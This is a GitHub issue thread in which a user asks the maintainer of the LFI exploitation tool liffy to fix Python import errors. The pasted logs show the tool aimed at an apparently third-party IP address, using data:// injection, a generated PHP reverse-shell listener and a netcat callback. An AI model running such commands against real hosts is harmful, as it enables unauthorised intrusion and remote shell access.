### ISSUE TITLE
liffy.py

### ISSUE THREAD

**Issue by shivamking05675** [mzfr/liffy#18]
I'm execute this command 

python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i                                                                                                                                                       

Liffy v2.0

[~] Checking Target: 206.209.126.5
[~] Testing with data:// 
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 4444
[~] Generating PHP listener
[+] Success! 
[~] listener: /tmp/shell.php
[~] Start your listener by running nc -ntlp 4444
[~] Starting Web Server ... 
Traceback (most recent call last):
  File "/home/king/liffy/core/server.py", line 11, in <module>
    import socketserver
ImportError: No module named socketserver
[?] Press Enter To Continue When Your netcat listener is Running ... 

I got The Error No module named socketserver

Please resolve my problem as soon as possiable

**Comment by mzfr** [comment]
what is your python version? Which OS are you running on?

**Comment by shivamking05675** [comment]
Os is Linux 2021-06-25 SMP Debian 5.10.46-kali

Python version is python 3.9.2

**Comment by mzfr** [comment]
I just tried it on my system and I didn't get any errors. But I've still replaced the keyword `python` to `python3` in all the subprocess command executions. https://github.com/mzfr/liffy/commit/5866f73a395f3fb46b58ad471813176a6d22e2fe

Even though this wasn't the cause of the error, just try to pull again and then use it. 

Also, try it out with a lower version of python like python3.8 and let me know if it works or not.

**Comment by shivamking05675** [comment]
Hello Mzfr sir,

This Time i'm using python 3.5 version and i got a new error.

python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i
 _      _  __  __              ___    ___  
| |    (_)/ _|/ _|            |__ \  / _ \                                                                                                                                                                                                   
| |     _| |_| |_ _   _  __   __ ) || | | |                                                                                                                                                                                                  
| |    | |  _|  _| | | | \ \ / // / | | | |                                                                                                                                                                                                  
| |____| | | | | | |_| |  \ V // /_ | |_| |                                                                                                                                                                                                  
|______|_|_| |_|  \__, |   \_/|____(_)___/                                                                                                                                                                                                   
                   __/ |                                                                                                                                                                                                                     
                  |___/                                                                                                                                                                                                                      
                                                                                                                                                                                                                                             


[~] Checking Target: 206.209.126.5
[~] Testing with data:// 
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 3333
[~] Generating PHP listener
[+] Success! 
[~] listener: /tmp/shell.php
[~] Start your listener by running nc -ntlp 3333
[~] Starting Web Server ... 
Traceback (most recent call last):
  File "/home/king/liffy/core/Server.py", line 12, in <module>
    daemon_context = daemon.DaemonContext()
AttributeError: module 'daemon' has no attribute 'DaemonContext'
[?] Press Enter To Continue When Your netcat listener is Running ...

Pelease give me a solution of this error?

**Comment by shivamking05675** [comment]
Can you tell me which os you are using and which python version u r using?

**Comment by mzfr** [comment]
That daemon error is because of the missing python package. Make sure you have installed all the requirements. 
I am using Ubuntu 20.04 inside WSL with python 3.8.2

**Comment by shivamking05675** [comment]
Thanks, I'll check it out.

**Comment by mzfr** [comment]
Feel free to open it again if you still facing the issue,
